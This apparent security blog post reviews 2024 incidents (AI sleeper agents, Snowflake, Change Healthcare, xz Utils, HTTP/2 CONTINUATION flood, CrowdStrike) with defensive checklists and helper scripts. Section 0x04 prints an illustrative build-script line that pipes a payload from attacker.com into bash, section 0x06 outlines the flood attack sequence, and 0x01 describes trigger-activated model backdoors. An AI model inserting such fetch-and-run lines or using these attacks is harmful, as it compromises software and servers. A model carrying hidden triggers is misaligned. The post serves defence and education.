ToxSec Cybersecurity Awareness Month!

ToxSec | Happy Cybersecurity Awareness Month! Let's talk about AI, cloud, and SaaS security. What's next? Passwordless authentication!

This year’s biggest security incidents show that supply chain integrity, third-party risk, and operational resilience are now more critical than ever. From AI backdoors to global outages caused by security tools, ToxSec breaks down the key lessons and the defensive plays you need to make.

0x00 The Year in Breach

Cybersecurity Awareness Month can feel like a compliance checkbox, but this year was a lesson in consequences. We watched a single ransomware attack freeze payments across the U.S. healthcare system. We saw SaaS credential leaks cascade into widespread customer data extortion. We also saw a new protocol-level DoS attack bring down servers with a single TCP connection, and a security tool update cause a global, self-inflicted outage.

If there’s one takeaway, it’s this: our attack surface grew, our dependencies deepened, and the guardrails lagged behind. The line between a vendor’s vulnerability and your own crisis has never been thinner. This isn’t about checking boxes; it’s about understanding the real-world threats that defined the last twelve months and building a defense that works.

0x01 Sleepers, Rules, and Risk

This was the year AI security left the lab and hit the real world. Research on “sleeper agents” proved that models can be trained to hide malicious behaviors that survive standard safety evaluations. These backdoors activate on a hidden trigger, like a specific phrase or date, turning a helpful assistant into an insider threat capable of leaking data or executing unauthorized commands. The integrity of your entire AI supply chain is now a critical security domain.

Check out the GenAI Crash Course if you want to dive deep into AI.



Regulators are moving quickly. The EU AI Act is no longer a future problem: its prohibitions on unacceptable-risk practices apply from February 2025, and obligations for general-purpose AI models follow in August 2025. For practical guidance, the NIST AI Risk Management Framework provides a solid baseline. It’s time to map your models, assess their risks, and build a governance process that can stand up to scrutiny.



Blue Team Checklist:

Inventory & Classify: Map all generative AI use cases and the models powering them.

Adopt NIST AI RMF: Use the framework to guide your governance, risk assessment, and control implementation.

Test Your Models: Don’t just trust vendor claims. Conduct red-teaming exercises to hunt for evasion, manipulation, and sleeper agent behaviors.

Track Legal Timelines: Brief your legal and compliance teams on the EU AI Act deadlines.

0x02 SaaS/Cloud Credential Cascades

The Snowflake incident was a wake-up call for SaaS security. Attackers didn’t breach Snowflake’s core infrastructure; they walked in the front door using credentials harvested from customer environments by info-stealer malware. This campaign highlighted a critical weakness: cloud security is often compromised by endpoint insecurity. Once inside customer tenants, the attackers exfiltrated data and initiated extortion campaigns, demonstrating how quickly a credential leak can become a major breach.

This event points to a systemic issue of secret sprawl, stale service accounts, and over-privileged OAuth applications across the SaaS ecosystem. The lesson is clear: your cloud is only as secure as the credentials used to access it.



Blue Team Checklist:

Enforce MFA Everywhere: No exceptions for any user, especially privileged accounts.

Use IP Allow-listing: Restrict access to your SaaS tenants to trusted corporate networks and VPNs.

Audit Service Accounts: Hunt for and eliminate stale, over-privileged, or unused service accounts and API keys.

Implement Workload Identities: Where possible, shift from long-lived credentials to short-lived, auto-rotating tokens for service-to-service communication.
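The service account audit above can start as a one-liner over whatever inventory export you already have. This is a minimal sketch, assuming a hypothetical CSV of `name,last_used` rows with ISO 8601 dates (YYYY-MM-DD) and no header row; the function name and file layout are illustrative, not any vendor's export format.

```shell
# stale_credentials CUTOFF_DATE
# Reads "name,last_used" rows on stdin (hypothetical export format) and prints
# the names last used before CUTOFF_DATE. An empty last_used field means the
# credential was never used, which is also treated as stale.
stale_credentials() {
  awk -F, -v cutoff="$1" '
    # ISO 8601 dates sort lexicographically, so a string comparison is enough.
    # Appending "" forces awk to compare as strings rather than numbers.
    NF >= 2 && ($2 "") < (cutoff "") { print $1 }
  '
}

# Example: flag anything unused since 1 July 2024.
printf 'svc-backup,2023-11-02\nsvc-ci,2024-09-30\nsvc-old,\n' |
  stale_credentials 2024-07-01
```

On systems with GNU `date`, a rolling 90-day cutoff (the 90 days is an assumption, tune it to your policy) can be computed with `date -d '90 days ago' +%F` and passed in as the argument.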

0x03 Ransomware vs. Critical Infrastructure

The Change Healthcare attack was a brutal demonstration of systemic risk. A single ransomware event didn’t just disrupt a company; it crippled a core pillar of the U.S. healthcare system. For weeks, claims processing was frozen, pharmacies faced delays filling prescriptions, and the personal data of a massive portion of the population was exposed. The outage revealed a national-scale single point of failure, proving that the security of one critical vendor can impact an entire industry.

This incident forces a hard look at resilience. You have to plan for the failure of the critical suppliers you depend on. If your billing, claims, or logistics provider went dark tomorrow, what would you do?

Blue Team Checklist:

Map Critical Dependencies: Identify all third-party services essential for core operations.

Demand Contingency Plans: Ask your critical vendors for their offline operating procedures and recovery plans.

Run Supplier Tabletops: Don’t just ask for plans; test them. Run joint incident response exercises with key suppliers to validate their (and your) playbooks.

Segment Your Networks: Ensure critical internal systems can operate even if external connections to a compromised vendor must be severed. Isolate payment and billing networks from general corporate traffic.
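Mapping critical dependencies does not need a GRC platform on day one. As a rough sketch, assuming a hypothetical CSV of `business_function,vendor` rows that you maintain by hand, the snippet below lists vendors that several core functions depend on. Those are your candidate single points of failure. The function name and the threshold are illustrative.

```shell
# shared_vendors MIN_COUNT
# Reads "business_function,vendor" rows on stdin (hypothetical format) and
# prints "vendor count" for every vendor that at least MIN_COUNT functions
# depend on, sorted by vendor name.
shared_vendors() {
  awk -F, -v min="$1" '
    NF >= 2 { count[$2]++ }
    END {
      for (vendor in count)
        if (count[vendor] >= min) print vendor, count[vendor]
    }
  ' | sort
}

# Example: which vendors sit behind two or more core functions?
printf 'claims,VendorA\nbilling,VendorA\npayroll,VendorB\npharmacy,VendorA\n' |
  shared_vendors 2
```

Anything this prints is a good first candidate for a supplier tabletop.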

0x04 Open-Source Supply Chain Wake-Up

The xz Utils backdoor (CVE-2024-3094) was the supply chain near-miss that cybersecurity professionals will be talking about for years. A sophisticated, patient attacker managed to slip a malicious backdoor into a ubiquitous open-source compression library used by major Linux distributions. It wasn’t found by a state-of-the-art scanner or a security audit; it was discovered by a developer who noticed SSH logins taking about 500ms longer than they should and dug into the cause.

This incident proved that even widely used and trusted open-source components can be compromised. The attack bypassed source code review and targeted the build process itself, highlighting the need for deeper visibility into how our software is made.

    # A compromised build script might look like this:

    # Legitimate build step
    ./configure && make

    # Malicious code injected by attacker
    if [ "$RELEASE_BUILD" = "true" ]; then
      # Only runs during the official build, making it harder to spot
      curl -s http://attacker.com/payload.sh | bash
    fi

Trusting a package simply because it’s popular is no longer a viable security strategy.



Blue Team Checklist:

Verify Software Provenance: Use frameworks like SLSA (Supply-chain Levels for Software Artifacts) to verify where your software components came from and how they were built.

Implement Build-Time Attestations: Ensure your CI/CD pipeline cryptographically signs and attests to the integrity of your build artifacts.

Monitor for Anomalies: Implement CI checks that look for unusual behavior, such as unexpected file changes, new dependencies, or performance degradation during the build process.

Diversify Your Dependencies: Where possible, avoid relying on a single open-source project or maintainer for critical functionality to reduce single points of failure.
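Full SLSA provenance and signed attestations take time to roll out. A much smaller first step is refusing to build with any artifact whose digest does not match one you pinned earlier. The sketch below assumes GNU coreutils `sha256sum` is available; `verify_digest` is a hypothetical helper name, and this checks integrity only, not who built the artifact or how.

```shell
# verify_digest FILE EXPECTED_SHA256
# Returns 0 if FILE hashes to EXPECTED_SHA256, 1 on a mismatch,
# and 2 if the file cannot be read.
verify_digest() {
  local file="$1" expected="$2" actual
  actual="$(sha256sum "$file")" || return 2   # missing or unreadable file
  actual="${actual%% *}"                      # keep only the hex digest
  [ "$actual" = "$expected" ]
}
```

In a CI step this might be used as `verify_digest vendor/lib.tar.xz "$PINNED_SHA256" || exit 1`, where the path and the `PINNED_SHA256` variable are placeholders for your own lockfile values. A pinned digest only proves the artifact has not changed since you pinned it, so it complements provenance checks rather than replacing them.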

0x05 Passwordless Tipping Point

The shift to passwordless authentication hit a critical mass this year. Passkeys are no longer a niche feature; they have significant momentum in both consumer and enterprise applications. Now is the time to move from experimenting to strategic planning. This means mapping out migration paths for your users, designing a seamless user experience, and building robust fallback mechanisms for when biometric or hardware authenticators aren’t an option.

Simultaneously, a major blow was struck against phishing. Google and Yahoo’s new bulk-sender requirements forced widespread adoption of email authentication standards like SPF, DKIM, and DMARC. This move is cleaning up the email ecosystem by making it significantly harder for attackers to spoof trusted domains. If you haven’t already, it’s time to get your own house in order.

Blue Team Checklist:

Plan Your Passkey Rollout: Begin piloting passkeys with internal teams to work out the UX and support kinks before a wider launch.

Audit Your Email Domains: Verify that all your domains have correct and enforced SPF, DKIM, and DMARC records.

Monitor DMARC Reports: Actively use DMARC aggregate and forensic reports to identify and shut down unauthorized services trying to send email as you.

Design for Fallbacks: Ensure your authentication flows gracefully handle scenarios where passkeys can’t be used.
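For the email domain audit, the key question is whether each DMARC record actually enforces anything. Here is a minimal sketch that parses a DMARC TXT record string and checks that the `p=` policy is `quarantine` or `reject`. The function names are hypothetical, and the check ignores the `pct` and `sp` tags, which a thorough audit should also review.

```shell
# dmarc_policy RECORD
# Prints the value of the p= tag from a DMARC record string, lowercased.
dmarc_policy() {
  printf '%s\n' "$1" |
    tr ';' '\n' |                 # one tag per line
    tr -d ' \t' |                 # drop whitespace around tags
    tr '[:upper:]' '[:lower:]' |
    sed -n 's/^p=//p' |           # matches p= only, not sp=
    head -n 1
}

# dmarc_is_enforced RECORD
# Succeeds only when the policy tells receivers to quarantine or reject.
dmarc_is_enforced() {
  case "$(dmarc_policy "$1")" in
    quarantine|reject) return 0 ;;
    *) return 1 ;;
  esac
}

# Example with a monitoring-only record, which is not enforced.
record='v=DMARC1; p=none; rua=mailto:dmarc@example.com'
dmarc_is_enforced "$record" || echo "policy '$(dmarc_policy "$record")' is not enforced"
```

To check a live domain, the record can be fetched with `dig +short TXT _dmarc.example.com` and passed in after stripping the surrounding quotes.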

0x06 Protocol-Layer DoS Returns

Last year’s Rapid Reset attack was a warning, and this year the HTTP/2 CONTINUATION Flood (tracked under several CVEs, including CVE-2024-27983 for Node.js) proved that protocol-level vulnerabilities are a persistent threat. The attack lets a single client exhaust server memory or CPU by sending an endless stream of CONTINUATION frames that never sets the END_HEADERS flag.

    # Conceptual example of the attack sequence
    SEND HEADERS (END_HEADERS flag is NOT set)
    SEND CONTINUATION (payload, END_HEADERS is NOT set)
    SEND CONTINUATION (payload, END_HEADERS is NOT set)
    ...
    # Repeat thousands of times without closing the header block
    # This forces the server to allocate memory for a giant header that never finishes

It’s a low-bandwidth, high-impact attack that bypasses traditional volume-based DDoS mitigations. This underscores the need to look beyond network-layer defenses and harden the application stack itself. Your edge infrastructure, including web application firewalls and load balancers, is the primary line of defense. The mitigations you put in place for Rapid Reset were a good start, but you need to verify that your vendors have provided specific protections against this new variant.

Blue Team Checklist:

Patch Your Edge: Immediately apply all security updates from your cloud providers, CDN vendors, and hardware manufacturers related to this vulnerability.

Review Edge Configurations: Check your WAF and server settings to ensure they enforce strict limits on the number of CONTINUATION frames per HTTP/2 stream.

Test Your Defenses: Don’t assume patches work. Use publicly available proof-of-concept tools to actively test whether your infrastructure is still vulnerable.

Map Protocol Dependencies: Understand where HTTP/2 is used in your environment and ensure all instances are protected, not just the public-facing ones.
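The limit described in the checklist is simple to reason about. The toy sketch below is not a real HTTP/2 parser: it assumes a hypothetical text trace with one frame per line in the form `TYPE END_HEADERS_FLAG`, and shows the kind of per-header-block cap a patched server or WAF enforces. Real implementations typically cap total header bytes as well.

```shell
# check_header_block MAX_CONTINUATIONS
# Reads "TYPE END_HEADERS_FLAG" lines on stdin (hypothetical trace format).
# Returns 0 when the header block closes within the limit, 1 when the limit
# is exceeded, and 2 when the stream ends with the block still open.
check_header_block() {
  local max="$1" count=0 type end_headers
  while read -r type end_headers; do
    if [ "$type" = "CONTINUATION" ]; then
      count=$((count + 1))
      if [ "$count" -gt "$max" ]; then
        echo "reject: $count CONTINUATION frames exceeds limit $max"
        return 1
      fi
    fi
    if [ "$end_headers" = "1" ]; then
      echo "ok: header block closed after $count CONTINUATION frames"
      return 0
    fi
  done
  echo "incomplete: header block never closed"
  return 2
}
```

The point of the cap is that the server gives up early and drops the connection instead of buffering a header block that never ends.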

0x07 Resilience > Perimeter

Perhaps the most humbling event of the year was watching a single, faulty security update from CrowdStrike trigger a historic global outage. From airlines to banks to media outlets, organizations around the world experienced massive disruptions. The incident was a powerful reminder that the tools meant to protect us can also become single points of failure. True resilience requires surviving the failure of your own defenses.

This event forces a critical re-evaluation of operational resilience and the risks of a vendor monoculture. If your EDR, firewall, or identity provider went down tomorrow, could you still operate? Do you have the ability to disable a faulty agent or roll back a bad update without taking down the entire fleet? Your resilience plan must account for failures from both external threats and trusted partners.

Blue Team Checklist:

Implement Staged Rollouts: Never push a critical update to your entire environment at once. Use phased deployments to catch issues before they become global incidents.

Test Your Kill-Switches: Ensure you have a reliable, out-of-band method to disable or roll back security agents and configurations.

Develop “EDR Down” Scenarios: Run tabletop exercises to simulate the failure of a critical security tool and validate your response and recovery playbooks.

Review Vendor Monoculture: Assess the risk of relying on a single vendor for a critical security function and explore options for diversification where it makes sense.
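A staged rollout boils down to a loop with a gate after every ring. This is a minimal sketch, assuming you supply your own deploy and health-check commands; `demo_deploy`, `demo_health`, and the ring names are hypothetical stand-ins so the example runs on its own.

```shell
# staged_rollout DEPLOY_CMD HEALTH_CMD RING...
# Deploys to each ring in order and stops at the first failed deploy or
# failed health check, so later rings never receive the bad update.
staged_rollout() {
  local deploy_cmd="$1" health_cmd="$2" ring
  shift 2
  for ring in "$@"; do
    if ! "$deploy_cmd" "$ring"; then
      echo "halt: deploy failed in ring '$ring'"
      return 1
    fi
    if ! "$health_cmd" "$ring"; then
      echo "halt: health check failed in ring '$ring'"
      return 1
    fi
    echo "ok: ring '$ring' healthy"
  done
}

# Hypothetical stand-ins for real tooling.
demo_deploy() { echo "deploying to $1"; }
demo_health() { [ "$1" != "early-adopters" ]; }   # simulate a bad update

staged_rollout demo_deploy demo_health canary early-adopters fleet ||
  echo "rollout stopped before the last ring"
```

In practice the health check would also wait for a soak period before passing, so slow-burning failures have time to surface before the next ring.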

0x08 A Unified Defense

The incidents that defined this year share a common thread: our risk is interconnected. The security of your AI models depends on the data they were trained on. The safety of your cloud tenants depends on the security of your employees’ laptops. The uptime of your entire business depends on the resilience of your critical vendors, including your security partners.

A modern defense is not a set of siloed tools. It is a unified strategy that treats the supply chain, third-party risk, and operational resilience as a single, integrated problem. The checklists in this report are a starting point. The real work is to build a culture where every team understands that in today’s environment, nobody is an island.

Want to read more? Check out ToxSec’s article on the Nvidia AI Kill Chain

Happy Cybersecurity Awareness Month!